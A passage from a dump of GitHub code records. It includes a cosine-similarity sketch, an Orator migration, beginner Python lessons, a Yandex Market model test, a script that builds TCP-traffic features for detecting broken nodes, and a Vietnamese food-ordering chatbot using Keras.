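The PlotBot record above reports the mean of pairwise cosine similarities between two sets of sentence embeddings. A minimal, self-contained sketch of the same cosine computation in plain PyTorch (the two embedding matrices are made-up stand-ins, so no model download is needed):

import torch
import torch.nn.functional as F

# Stand-ins for sentence embeddings: rows are "sentences" (hypothetical values).
a = torch.tensor([[1.0, 0.0], [0.0, 1.0]])
b = torch.tensor([[1.0, 1.0]])

# Cosine similarity of every row of a against every row of b: L2-normalize
# each row, then take dot products -- the same quantity util.cos_sim yields.
sim = F.normalize(a, dim=1) @ F.normalize(b, dim=1).T
print(sim)                 # tensor([[0.7071], [0.7071]])
print(sim.mean().item())   # 0.7071..., the 'mean similarity' the script prints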
Search\",\n        \"Other\",\n        \"Algorithms\",\n        \"Root\",\n    ]\n","repo_name":"martin-ueding/game-simulation-sandbox","sub_path":"game_simulation_sandbox/treesearch/test_backtracking.py","file_name":"test_backtracking.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"72975286187","text":"from orator.migrations import Migration\n\n\nclass CreatePortfoliosTable(Migration):\n\n    def up(self):\n        \"\"\"\n        Run the migrations.\n        \"\"\"\n        with self.schema.create('portfolios') as table:\n            table.increments('id')\n            table.text('name')\n            table.integer('user_id').unsigned()\n            table.foreign('user_id').references('id').on('users')\n            table.integer('portfolio_id').unsigned()\n            table.foreign('portfolio_id').references('id').on('portfolios')\n            table.timestamps(use_current=True)\n\n    def down(self):\n        \"\"\"\n        Revert the migrations.\n        \"\"\"\n        self.schema.drop('portfolios')\n","repo_name":"jhosoume/alpha50_orator_test","sub_path":"db/migrations/2016_07_09_010109_create_portfolios_table.py","file_name":"2016_07_09_010109_create_portfolios_table.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"27116712663","text":"# /**\n# * @author Benjamin Peronne\n# * @email contact@benjaminperonne.fr\n# * @create date 2022-10-20 13:33:42\n# * @modify date 2022-10-20 13:33:42\n# * @desc [TP3 - Exercice 6]\n# */\n\n# Objective: the Fibonacci sequence, computed recursively\n\ndef fibonacci(p_n):\n    if (p_n == 0):\n        return 0\n    elif (p_n == 1):\n        return 1\n    else:\n        return fibonacci(p_n - 1) + fibonacci(p_n - 2)\n\n\ndef main():\n    n = int(input(\"Entrez un entier n positif non nul : \"))\n    for i in range(n + 1):\n        print(fibonacci(i))\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"BenjaminPeronne/TP_3_Python_M1info","sub_path":"TP3_6.py","file_name":"TP3_6.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"29315093640","text":"#Errors and Practice\n\n'''\n3 types:\n    1. Syntax errors - where the code violates syntax rules for a proper python program\n        - detected at compile time\n        - program will not run unless they are corrected\n        - ex:\n            -undeclared identifiers\n            -invalid identifiers\n            -failure to close a comment or string properly\n            -incorrect indentation\n    2. Runtime errors\n        - causes a program to \"crash\": an error is reported, and control is turned over to the operating system\n        - ex:\n            -division by zero\n            -getting into an infinite loop, which may ultimately cause a stack overflow\n    3. Logic errors\n        - cause the program to compute incorrect results\n            -often go unnoticed\n\n'''\n\n\n'''\nMA3 practice problems\n    Label each of the following as either \"Python reserved keyword\", \"standard identifier\", or \"other valid identifier\":\n        int: standard\n        PI: other\n        if: reserved\n        main: other\n        while: reserved\n        high_score: other\n\n    How should you read the statement: temp_value = old_value + new_value?\n        \"temp_value\" is assigned the value of \"old_value\" plus \"new_value\"\n\n    Which Python data type would be best to represent the following? For each blank, you may list int, float, or str only.\n        Gender: str\n        Average of 10 numbers: float\n        Number of students in CptS111: int\n        Price of a gallon of milk: float\n'''\n\n#Modules and Practice\n\n'''\nMA4 Practice Problems\n    What are the three kinds of programming errors? Can you give an example of each?\n        A. syntax error\n        B. run-time error\n        C. logic error\n\n    Rank the order of precedence for the following C operators (1 is the highest precedence and 5 is the lowest)\n        + # binary addition\n        - # unary minus (e.g. negation)\n        % # modulus\n        = # assignment\n        () # parentheses\n    Evaluate each of the following equations and determine the resultant data type:\n        4 / 12 =\n        4 // 12 =\n        4 % 12 =\n        7 // 4 =\n        9.0 / 4.0 =\n        3 / 0 =\n        3.0 % 1 =\n        16 % 0 =\n        3 % 5 =\n        9 % 5 =\n        2 * 4 ** 2 =\n        2 ** 4 ** (2 / 4) =\n    Given y = m % n, what are the possible values of y?\n\n    Write the following equation as a Python arithmetic statement: $$q=\\frac{kA(T_1-T_2)}{L}$$\n\n    Show the output displayed by the following program when the data entered are 12 for m and 0 for n:\n        m = int(input(\"Enter an integer> \"))\n        n = int(input(\"Enter an integer> \"))\n        m = m + 5\n        n = 3 * n\n        print(\"m = %d\\nn = %d\\n\" %(m, n))\n'''
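The evaluation exercise just above has definite answers under Python 3 semantics; a worked pass, with each value and type in a comment (a study aid, assuming Python 3 division rules):

4 / 12             # 0.333... -> float (true division always yields a float)
4 // 12            # 0    -> int (floor division)
4 % 12             # 4    -> int
7 // 4             # 1    -> int
9.0 / 4.0          # 2.25 -> float
3.0 % 1            # 0.0  -> float (one float operand makes the result a float)
3 % 5              # 3    -> int
9 % 5              # 4    -> int
2 * 4 ** 2         # 32   -> int (** binds tighter than *)
2 ** 4 ** (2 / 4)  # ** is right-associative: 2 ** (4 ** 0.5) == 2 ** 2.0 == 4.0 -> float
# 3 / 0 and 16 % 0 do not produce values: both raise ZeroDivisionError.
# y = m % n: for positive n, y is one of 0, 1, ..., n-1 (Python's % takes the sign of n).
# q = k * A * (T_1 - T_2) / L   # the equation as a Python statement, once k, A, T_1, T_2, L are defined
# The m/n program with inputs 12 and 0 prints m = 17 and n = 0 (m = 12 + 5; n = 3 * 0).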
\n\n'''\nPython Modules\n    module: a file that contains a collection of related variables and functions\n\n    you must import all of the modules before you can use them in your code\n\nMath Functions\n    the math module includes many common mathematical functions\n\n    common functions:\n        fabs() for absolute values\n        ceil() for computing the ceiling of a number\n        floor() for computing the floor of a number\n        cos() for cosine function\n        sin() for sine function\n        tan() for tangent function\n        pow() for raising a number to its power\n        log() for logarithms (see also log2() and log10())\n        sqrt() for computing square roots\n\nTurtle Graphics\n    used for doing GUI stuff\n\nSoftware development method\n    six basic steps:\n        1. specify problem requirements\n        2. analyze the problem\n        3. design an algorithm to solve the problem\n        4. implement an algorithm\n        5. test and verify the completed program\n        6. maintain and update the program\n'''\n\n\n'''\nPractice Problems\n    1. Write a program to compute the total price for a purchase after sales tax.\n\n    example output:\n    Please enter the purchase price: 9.00\n    Please enter the sales tax as a percent (%): 7.8\n    Total purchase price after tax: $9.70\n'''\n\ndef sales_tax():\n    purchase = float(input(\"Please enter the purchase price: \"))\n    tax_percent = float(input(\"Please enter the sales tax as a percent (%): \"))\n\n    tax = purchase * (tax_percent / 100.0)\n    purchase += tax\n\n    print(\"Total purchase price after tax: $%.2f\" %(purchase))\n\n'''\n    2. write a program that calculates mileage reimbursement for a salesperson at the rate of $.35/mile\n\n    example output:\n\n    MILEAGE REIMBURSEMENT CALCULATOR\n    Please enter the beginning odometer reading: 13505.2\n    Please enter the ending odometer reading: 13810.6\n    You traveled 305.4 miles. At $0.35 per mile, your reimbursement is $106.89\n'''\n\ndef mileage_reimbursement():\n    print(\"MILEAGE REIMBURSEMENT CALCULATOR\")\n    odo_begin = (float(input(\"Please enter the beginning odometer reading: \")))\n    odo_ending = (float(input(\"Please enter the ending odometer reading: \")))\n\n    traveled = odo_ending - odo_begin\n    reimbursement = traveled * .35\n    print(\"You traveled %.1f miles. At $.35 per mile, your reimbursement is $%.2f\" %(traveled, reimbursement))\n\n'''\n    3. write a program that takes the values for m and n as input and displays the values of the Pythagorean triple generated by the formulas above\n\n    example output:\n    Please enter a m value: 4\n    Please enter a n value: 2\n    Pythagorean triple: 12^2 + 16^2 = 20^2\n'''\n\ndef pythagorean():\n    m = int(input(\"Please enter a m value: \"))\n    n = int(input(\"Please enter a n value: \"))\n\n    side1 = m**2 - n**2\n    side2 = 2 * m * n\n    hyp = m**2 + n**2\n\n    print(\"Pythagorean triple:%d^2 + %d^2 = %d^2\" %(side1, side2, hyp))\n","repo_name":"clairenoel97/CPSC111","sub_path":"CPSC111 - Beginning Python/lesson3.py","file_name":"lesson3.py","file_ext":"py","file_size_in_byte":5554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
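Checking the example output of the record that just ended: m=4, n=2 gives side1 = 16 - 4 = 12, side2 = 2*4*2 = 16, hyp = 16 + 4 = 20, and indeed 12**2 + 16**2 = 144 + 256 = 400 = 20**2. As a two-line sanity check:

m, n = 4, 2
assert (m**2 - n**2)**2 + (2*m*n)**2 == (m**2 + n**2)**2   # 144 + 256 == 400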
+{"seq_id":"74988205548","text":"from tests.cases import ModelTestCase, ET\nfrom tests.factories import ParameterFactory\nfrom yandex_market_language.exceptions import ValidationError\nfrom yandex_market_language.models import Parameter\n\n\nclass ParameterModelTestCase(ModelTestCase):\n    def test_to_dict(self):\n        name, value, unit = \"Size\", \"33\", \"M\"\n        p = ParameterFactory(name, value, unit)\n        d = p.to_dict()\n        self.assertEqual(d[\"name\"], name)\n        self.assertEqual(d[\"value\"], value)\n        self.assertEqual(d[\"unit\"], unit)\n\n    def test_to_xml(self):\n        name, value, unit = \"Size\", \"33\", \"M\"\n        p = ParameterFactory(name, value, unit)\n        el = p.to_xml()\n        expected_el = ET.Element(\"param\", {\"name\": name, \"unit\": unit})\n        expected_el.text = value\n        self.assertElementsEquals(el, expected_el)\n\n    def test_value_property(self):\n        p = ParameterFactory()\n        with self.assertRaises(ValidationError) as e:\n\n            class Err:\n                def __str__(self):\n                    return 1\n\n            p.value = Err()\n\n        self.assertEqual(str(e), \"value must be a string\")\n\n    def test_from_xml(self):\n        p = ParameterFactory()\n        el = p.to_xml()\n        parsed_p = Parameter.from_xml(el)\n        self.assertEqual(p.to_dict(), parsed_p.to_dict())\n","repo_name":"stefanitsky/yandex_market_language","sub_path":"tests/models/test_parameter.py","file_name":"test_parameter.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"}
+{"seq_id":"13689166032","text":"# -*- coding:UTF-8 -*-\nimport sys\nfrom collections import defaultdict\nimport os\ndef selfadd2dimDict(theDict, key_a, key_b):\n    # Purpose: increment by 1 the value stored in the int dict theDict at the index pair {key_a: {key_b: val}}\n    # Note: the interpreter cannot tell whether the first-level key already exists in theDict, so assigning straight into a two-level dict (as with a 2-D array) raises an error; the index pair has to be added as below\n\n    if key_a in theDict:\n        if key_b in theDict[key_a]:\n            theDict[key_a][key_b] += 1\n        else:\n            theDict[key_a].update({key_b: 1})\n    else:\n        theDict.update({key_a: {key_b: 1}})\n\n\nbrokennode_list=[]\nglobal brokencount\nbrokencount=104\nglobal event\nevent=104\nfor i in range(event):\n    path='brokennode'+str(i)\n    brokennode_list.append(path)\n## the sample count must stay aligned with the parameter in feature1.py\nglobal wind_count\nwind_count=8\nfor path in brokennode_list:\n    path_test=path+'/s0-0.txt'\n    if((os.path.exists(path_test))==False):\n        print(path_test)\n        print('A')\n        continue\n    for i in range(brokencount):\n        tcp_source = defaultdict(int)\n        tcp_target = defaultdict(int)\n        tcp_count = defaultdict(int)\n        retra_count = defaultdict(int)\n        icmp_source = defaultdict(int)\n        arp_source = defaultdict(int)\n        arp_target = defaultdict(int)\n        pair = defaultdict(int)\n        flag = defaultdict(int)\n        retra_source = defaultdict(int)\n        retra_target = defaultdict(int)\n\n        for k in range(wind_count): \n            path_txt=path+'/s'+str(i)+'-'+str(k)+'.txt'\n            f=open(path_txt,'r')\n\n            tcp_source[str(k)] = {}\n            tcp_target[str(k)] = {}\n            retra_source[str(k)] = {}\n            retra_target[str(k)] = {}\n\n            ### build the per-IP sketch\n            ###\n            count_tcp=0\n            count_pair=0\n            count_arp_source=0\n            count_arp_target=0\n\n            ## tcp_count counts TCP packets\n            ## retra_count counts retransmission packets\n            tcp_count[str(k)]=0\n            retra_count[str(k)]=0\n            for item in f:\n                keys=item.split('\\t')\n                if(len(keys)<=4):\n                    continue\n                if(keys[4]=='TCP'):\n                    temp_source=keys[1]\n                    temp_target=keys[3]\n                    selfadd2dimDict(tcp_source, str(k), temp_source)\n                    selfadd2dimDict(tcp_target, str(k), temp_target)\n                    tcp_count[str(k)]+=1\n\n                    p6=keys[6].strip()\n                    retra='[TCP Retransmission]'\n                    temp=p6[:len(retra)]\n                    if(temp==retra):\n                        selfadd2dimDict(retra_source, str(k), keys[1])\n                        selfadd2dimDict(retra_target, str(k), keys[3])\n                        retra_count[str(k)]+=1\n            f.close()\n\n\n        for k in range(wind_count):\n            path_result = path + '/s' + str(i) + '-' + str(k) + '_1.txt'\n            f_result = open(path_result, 'w')\n\n            ### aggregate statistics for IP_source and IP_target\n            ### and record the results\n            for j in range(1,brokencount+1):\n                ### information within this window\n                ### f1: this IP's share of all TCP packets as tcp_src\n                ### f2: this IP's share of all TCP packets as tcp_dst\n                ### f3: this IP's share of all retransmission packets as retra_src\n                ### f4: this IP's share of all retransmission packets as retra_target\n                ### f5: whether there are any TCP packets\n                ### f6: whether there are any retransmission packets\n                ip='192.168.123.'+str(j)\n                f1=0\n                f2=0\n                f3=0\n                f4=0\n                f5=0\n                f6=0\n\n                # newly added features\n                is_first_window = 1 if k == 0 else 0  # whether the current window is the first one\n\n                ratio_tcp_src_prev = 1  # ratio of this IP's IP_source count in the current window to the previous window\n                if k == 0 and ip not in tcp_source[str(k)]:  # case: current window is the first one and has no IP_source\n                    ratio_tcp_src_prev = 0\n                if k != 0:\n                    if ip not in tcp_source[str(k)]:  # case: no IP_source in the current window\n                        ratio_tcp_src_prev = 0\n                    elif ip not in tcp_source[str(k-1)]:  # case: no IP_source in the previous window\n                        ratio_tcp_src_prev = tcp_source[str(k)][ip] + 1\n                    else:\n                        ratio_tcp_src_prev = (tcp_source[str(k)][ip]+1)/(float(tcp_source[str(k-1)][ip]+1))\n\n                ratio_tcp_tar_prev = 1  # ratio of this IP's IP_target count in the current window to the previous window\n                if k == 0 and ip not in tcp_target[str(k)]:  # case: current window is the first one and has no IP_target\n                    ratio_tcp_tar_prev = 0\n                if k != 0:\n                    if ip not in tcp_target[str(k)]:  # case: no IP_target in the current window\n                        ratio_tcp_tar_prev = 0\n                    elif ip not in tcp_target[str(k-1)]:  # case: no IP_target in the previous window\n                        ratio_tcp_tar_prev = tcp_target[str(k)][ip] + 1\n                    else:\n                        ratio_tcp_tar_prev = (tcp_target[str(k)][ip]+1)/(float(tcp_target[str(k-1)][ip]+1))\n\n                is_last_window = 1 if k == wind_count-1 else 0  # whether the current window is the last one\n\n                ratio_tcp_src_next = 1  # ratio of this IP's IP_source count in the current window to the next window\n                if k == wind_count-1 and ip not in tcp_source[str(k)]:  # case: current window is the last one and has no IP_source\n                    ratio_tcp_src_next = 0\n                if k != wind_count-1:\n                    if ip not in tcp_source[str(k)]:  # case: no IP_source in the current window\n                        ratio_tcp_src_next = 0\n                    elif ip not in tcp_source[str(k+1)]:  # case: no IP_source in the next window\n                        ratio_tcp_src_next = tcp_source[str(k)][ip] + 1\n                    else:\n                        ratio_tcp_src_next = (tcp_source[str(k)][ip]+1)/(float(tcp_source[str(k+1)][ip]+1))\n\n                # print(k-1)\n                ratio_tcp_tar_next = 1  # ratio of this IP's IP_target count in the current window to the next window\n                if k == wind_count-1 and ip not in tcp_target[str(k)]:  # case: current window is the last one and has no IP_target\n                    ratio_tcp_tar_next = 0\n                if k != wind_count-1:\n                    if ip not in tcp_target[str(k)]:  # case: no IP_target in the current window\n                        ratio_tcp_tar_next = 0\n                    elif ip not in tcp_target[str(k+1)]:  # case: no IP_target in the next window\n                        ratio_tcp_tar_next = tcp_target[str(k)][ip] + 1\n                    else:\n                        ratio_tcp_tar_next = (tcp_target[str(k)][ip]+1)/(float(tcp_target[str(k+1)][ip]+1))\n\n                \"\"\"\n                if(tcp_count!=0):\n                    f1=tcp_source[ip]/tcp_count\n                    f2=tcp_target[ip]/tcp_count\n                    #f1=tcp_source[ip]\n                    #f2=tcp_target[ip]\n                    f5=1\n                \"\"\"\n                if ip not in tcp_source[str(k)]:\n                    f1 = 0\n                else:\n                    f1=tcp_source[str(k)][ip]\n                if ip not in tcp_target[str(k)]:\n
                    f2 = 0\n                else:\n                    f2=tcp_target[str(k)][ip]\n                f5=tcp_count[str(k)]\n                if(retra_count[str(k)]!=0):\n                    if ip not in retra_source[str(k)]:\n                        f3 = 0\n                    else:\n                        f3=retra_source[str(k)][ip]/retra_count[str(k)]\n                    if ip not in retra_target[str(k)]:\n                        f4 = 0\n                    else:\n                        f4=retra_target[str(k)][ip]/retra_count[str(k)]\n                    f6=1\n                try:\n                    f_result.write(str(j-1)+'\\t'+ip+'\\t'+str(f1)+'\\t'+str(f2)+'\\t'+str(f3)+'\\t'+str(f4)+'\\t'+str(f5)+'\\t'+str(f6)+'\\t'+\n                                   str(is_first_window)+'\\t'+str(ratio_tcp_src_prev)+'\\t'+str(ratio_tcp_tar_prev)+'\\t'+\n                                   str(is_last_window)+'\\t'+str(ratio_tcp_src_next)+'\\t'+str(ratio_tcp_tar_next)+'\\n')\n                except:\n                    print(ip)\n            f_result.close()\n","repo_name":"yelianjin/PUFF","sub_path":"feature2.py","file_name":"feature2.py","file_ext":"py","file_size_in_byte":8380,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
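The adjacent-window ratio features in feature2.py above use add-one smoothing so that an empty neighbouring window cannot cause a division by zero. A stripped-down sketch of that single feature (the helper name and the counts are mine, purely illustrative):

def window_ratio(counts, k, ip):
    # Mirrors ratio_tcp_src_prev above: 0 if the IP is absent from the current
    # window; count+1 if it was absent from the previous window; otherwise the
    # add-one smoothed ratio of the two windows' counts.
    cur = counts[k].get(ip)
    if cur is None:
        return 0
    prev = counts[k - 1].get(ip) if k > 0 else None
    if prev is None:
        return cur + 1 if k > 0 else 1
    return (cur + 1) / float(prev + 1)

# Hypothetical per-window TCP source counts for one IP:
counts = [{'192.168.123.5': 4}, {'192.168.123.5': 9}]
print(window_ratio(counts, 1, '192.168.123.5'))   # (9 + 1) / (4 + 1) = 2.0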
+{"seq_id":"25750937729","text":"import tensorflow as tf\nimport json\nimport numpy as np\nfrom tensorflow import keras\nfrom keras.models import load_model\nimport random\nimport time\n\n\nfrom MachineSimilarAnswser import *\n\nclass_names = [\"LIỆT_KÊ\", \"ĐẶT_MÓN\", \"THAY_ĐỔI_MÓN\",\"END\"]\npath_input = './model/Model.json'\npath_save_model = '.\\data\\ModelClass.bin'\npath_test = './data/NewTFIDFOne.json'\npathMenuFood = './data/DataMenu.json'\norderItemTam = []\n\ndef train_model():\n    with open(path_input, encoding='utf-8-sig') as json_file:\n        input = json.load(json_file)\n\n    random.shuffle(input)  # shuffle the data array\n    arr_train = []\n    label_train = []\n    arr_test = []\n    label_test = []\n    indexTest = []\n    i = 0\n\n    for element in input:\n        length = len(element['data'])\n        i = i + 1\n        # print(element['label'])\n        if i < 3000:\n            arr_train.append(element['data'])\n            label_train.append(element['label'])\n        else:\n            arr_test.append(element['data'])\n            label_test.append(element['label'])\n\n    train_sentences = np.array(arr_train)\n    train_labels = np.array(label_train)\n    test_sentences = np.array(arr_test)\n    test_labels = np.array(label_test)\n    model = keras.Sequential([\n        keras.layers.Flatten(input_shape=(length,)),\n        keras.layers.Dense(128, activation=tf.nn.relu),\n        keras.layers.Dense(len(class_names), activation=tf.nn.softmax)\n    ])\n\n    # config model when train\n    model.compile(optimizer='adam',\n                  loss='sparse_categorical_crossentropy',\n                  metrics=['accuracy'])\n\n    model.fit(train_sentences, train_labels,\n              epochs=500)  # epochs: number of training passes\n    if len(test_sentences) > 0:\n        test_loss, test_acc = model.evaluate(test_sentences, test_labels)\n        print('\\nTest accuracy:', test_acc, 'loss: ', test_loss)\n        print(test_sentences, test_labels)\n    # if test_acc > 0.8 :\n    #     model.save(path_save_model)\n    #     return\n    # else:\n    #     return train_model()\n\n    return model.save(path_save_model)\n\n\ndef predictSentence(sen):\n    sen = chuyen_doi_chu_so_thanh_so(sen)\n    vectorInput = createNewTFIFOneSentence(sen)\n    vectorInput = np.asarray(vectorInput)\n    start_time = time.time()\n    if 'model' not in globals():\n        global model\n        model = load_model(path_save_model)\n    if 'orderItemTam' not in globals():\n        global orderItemTam\n    predicted = model.predict(np.array([vectorInput, ]))\n    index = np.argmax(predicted[0])\n    print(word_segmentation(sen, False), \": dự đoán max ==>\",class_names[index], predicted[0][index])\n    weigth = predicted[0][index]\n    data = {\"context_question\": \"Vui lòng thử lại\", \"tag\": False, \"End\": False}\n    if weigth >= 0.7:\n        action = \"showList\"  # show the list\n        Food = \"null\"\n        num_oder = 0\n        data = similarListToken(sen, index)\n        if index != 0 and index != 3:\n            Food = detectionListFood(sen)  # get the list of dishes\n            action = detectionDetailAction(sen,Food)  # get the list of actions\n            num_oder = detection_number(sen,Food)\n            print(\"order\",num_oder)\n            print(\"action\",action)\n            FoodArraySort = []\n            for i in sorted (Food.keys()):\n                FoodArraySort.append(Food[i])\n            Food = FoodArraySort\n            num = 0\n            print(\"Food\",Food)\n            if len(Food) > 0 and len(num_oder):\n                if len(Food) == len(num_oder):\n                    for i in range(len(action)):\n                        num = num_oder[i]\n                        if action[i] == 2 :  # remove from the order entirely\n                            if num == 0:\n                                deleteFoodInOrder(Food[i],False)\n                            else :\n                                deleteFoodInOrder(Food[i],num)\n\n                        if action[i] == 0 :  # add to the order\n                            AddFoodInOrder(Food[i],num)\n                        if action[i] == 1:  # decrease the quantity of the dish or drink in the order\n                            GiamFoodInOrder(Food[i],num)\n                else:\n                    for i in range(len(action)):\n                        num = num_oder[i]\n                        if action[i] == 2 :  # remove the item\n                            if num == 0:\n                                deleteFoodInOrder(Food[i],False)\n                            else :\n                                deleteFoodInOrder(Food[i],num)\n                        if action[i] == 0:\n                            AddFoodInOrder(Food[i],num)\n                        if action[i] == 1:\n                            GiamFoodInOrder(Food[i],num)\n            else:\n                return {\"status\":False, \"End\":False,\"data\":[]}  # no dish was found\n            print(\"Hóa đơn\",orderItemTam)\n            return {\"status\":True, \"End\":False,\"data\":orderItemTam}\n\n        if index == 0:\n\n            Food = data[\"context_question\"]  # the list-type case\n        if index == 3:\n            return {\"status\":True, \"End\":True,\"data\":orderItemTam}\n    else:\n        print(\"Không hiểu\")\n        return {\"status\":False, \"End\":False,\"data\":[]}  # the case where no class could be assigned\n\n\ndef UpdateNewQuestion():\n    path_input = \"./data/ListSentenceNotVaild.json\"\n    list_data = get_data(path_input)\n    listAnswerQuestion = []\n    # \"tag\": 0,\n    # \"content\": \"Kẹt xe\",\n    # \"context_question\": \"Bạn có thể nói rõ hơn được không?\"\n    for data in list_data:\n        content = data['content']\n        # listAnswerQuestion.append({\"tag\":data['tag'],\"content\":data['content'],\"context_question\":data['context_question'],\"End\":False})\n        Class = predictSentence(content)\n        lable = Class[\"label\"]\n        weigth = Class[\"weigth\"]\n\n        if weigth >= 0.9:\n            data[\"newtag\"] = int(lable)\n            data[\"nameLabel\"] = class_names[lable]\n            if \"context_question\" not in data:\n                data[\"context_question\"] = \"Tôi chưa hiểu câu nói của bạn\"\n            if \"End\" not in data:\n                data[\"End\"] = True\n            listAnswerQuestion.append(data)\n    with open('./data/UpdatelistAnserQ3.json', 'w+', encoding='utf-8-sig') as json_file:\n        json.dump(listAnswerQuestion, json_file, ensure_ascii=False)\n        print('write: thêm key vào json thành công!')\n\ndef deleteFoodInOrder(food,num):\n    if num :\n        for i in range(len(orderItemTam)):\n            item = orderItemTam[i]\n            if food[\"name\"] == item[\"name\"]:\n                orderItemTam[i][\"num_order\"] = orderItemTam[i][\"num_order\"] - num\n    else:\n        for i in range(len(orderItemTam)):\n            item = orderItemTam[i]\n            if food[\"name\"] == item[\"name\"]:\n                del orderItemTam[i]\n\ndef AddFoodInOrder(food,num):\n    if 'orderItemTam' not in globals():\n        global orderItemTam\n    # print(\"Gọi hàm add food\")\n    if len(orderItemTam) == 0:\n        orderItemTam.append({\"name\":food[\"name\"],\"price\":food[\"price\"],\"num_order\":num})\n    else:\n        print(orderItemTam)\n        checkHave = False\n        for i in range(len(orderItemTam)):\n            item = orderItemTam[i]\n            if food[\"name\"] == item[\"name\"]:\n                checkHave = True\n                print(\"thêm food\",num,food)\n                orderItemTam[i][\"num_order\"] = orderItemTam[i][\"num_order\"] + num\n        if not checkHave :\n            orderItemTam.append({\"name\":food[\"name\"],\"price\":food[\"price\"],\"num_order\":num})\n
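# --- Illustrative aside, not part of responsechat.py: how the helpers above mutate the
# --- module-level order list. With a hypothetical menu entry,
# ---     AddFoodInOrder({"name": "Bún thịt nướng", "price": 45000}, 2)
# --- appends {"name": "Bún thịt nướng", "price": 45000, "num_order": 2} to orderItemTam,
# --- while a second call with num=1 finds the matching name and bumps num_order to 3
# --- instead of appending a duplicate row.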
\ndef GiamFoodInOrder(food,num):\n    if 'orderItemTam' not in globals():\n        global orderItemTam\n    # print(\"Gọi hàm add food\")\n    if len(orderItemTam) == 0:\n        orderItemTam.append({\"name\":food[\"name\"],\"price\":food[\"price\"],\"num_order\":num})\n    else:\n        print(orderItemTam)\n        checkHave = False\n        for i in range(len(orderItemTam)):\n            item = orderItemTam[i]\n            if food[\"name\"] == item[\"name\"]:\n                print(\"giảm food\",num,food[\"name\"])\n                orderItemTam[i][\"num_order\"] = orderItemTam[i][\"num_order\"] - num\n\ndef detection_number(sentence,Food):\n    sentence = word_segmentation(sentence,False)\n    arrNumber = []\n    if len(sentence) > 0:\n        for word in sentence:\n            if word.isdigit():\n                arrNumber.append(int(word))\n    print(arrNumber)\n    return arrNumber\n\ndef detectionDetailAction(sentence,Food):\n    data = dict()\n    # add quantity\n    data[\"thêm\"] = 0\n    data[\"đặt\"] = 0\n    data[\"cho\"] = 0\n    data[\"tăng\"] = 0\n    data[\"chọn\"] = 0\n    data[\"mua\"] = 0\n    data[\"lấy\"] = 0\n    data[\"gọi\"] = 0\n    data[\"cập nhật\"] = 0\n    # decrease quantity\n    data[\"bớt\"] = 1\n    data[\"giảm\"] = 1\n    data[\"giảm bớt\"] = 1\n    data[\"ít\"] = 1\n    data[\"bỏ bớt\"] = 1\n    # remove quantity\n    data[\"bỏ đi\"] = 2\n    data[\"xóa\"] = 2\n    data[\"bỏ\"] = 2\n    # print(\"số thức ăn trong câu là\",len(Food))\n    sentence = word_segmentation(sentence,False)\n    arr = []\n    countAction = 0\n    for word in sentence:\n        if word in data :\n            if countAction < len(Food):\n                countAction = countAction + 1\n                arr.append(data[word])\n    # print(\"số action trong câu là\",len(arr))\n    # if len(arr) < len(Food):\n    #     for target_list in expression_list:\n    #         pass\n    #     arr.append()\n    return arr\n\ndef chuyen_doi_chu_so_thanh_so(sen):\n    dict_chu_so = {}\n    dict_chu_so = {'hai mươi mốt': 21, 'hai mươi hai': 22, 'hai mươi ba': 23, 'hai mươi bốn': 24, 'hai mươi lăm': 25, 'hai mươi sáu': 26, 'hai mươi bảy': 27, 'hai mươi tám': 28, 'hai mươi chín': 29,\n                   'mười một': 11, 'mười hai': 12, 'mười ba': 13, 'mười bốn': 14, 'mười lăm': 15, 'mười sáu': 16, 'mười bảy': 17, 'mười tám': 18, 'mười chín': 19, 'hai mươi': 20, 'ba mươi': 30,\n                   'một': 1, 'hai': 2, 'ba': 3, 'bốn': 4, 'năm': 5, 'sáu': 6, 'bảy': 7, 'tám': 8, 'chín': 9, 'mười': 10}\n\n    sen = \" \".join(sen.split())  # collapse runs of whitespace into single spaces\n    for key in dict_chu_so:\n        if key in sen:\n            sen = sen.replace(key, str(dict_chu_so[key]))\n    return sen\n\n\ndef detectionListFood(sentence):\n    sentence = sentence.lower()\n    listFood = dict()\n    # print(\"câu truy vấn \", sentence)\n    with open(pathMenuFood, encoding='utf-8-sig') as json_file:\n        input = json.load(json_file)\n    for food in input:\n        nameFood = food[\"name\"].lower()\n        index = sentence.find(nameFood)\n        if index >= 0:\n            listFood[index] = food\n\n    return listFood\n\n\nif __name__ == '__main__':\n    # newSen = chuyen_doi_chu_so_thanh_so(\"Tôi muốn bớt mười lăm món Bánh phô mai cà phê\")\n    listFood = detectionListFood(\"Tôi muốn bớt món Bánh phô mai cà phê\")\n    print(listFood)\n    # train_model()\n    # num = detection_number(\"tôi đặt 5 phần bún thịt nướng\")\n    # print(\"số lượng \", num)\n\n    # predictSentence(\"tôi bị bệnh\")\n    # ms.similarListToken(\"tôi đi vá bánh xe\", 0)\n    # UpdateNewQuestion()\n","repo_name":"poscantho24a3/dtu-cse","sub_path":"responsechat.py","file_name":"responsechat.py","file_ext":"py","file_size_in_byte":11330,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"21639504225","text":"from django.http 
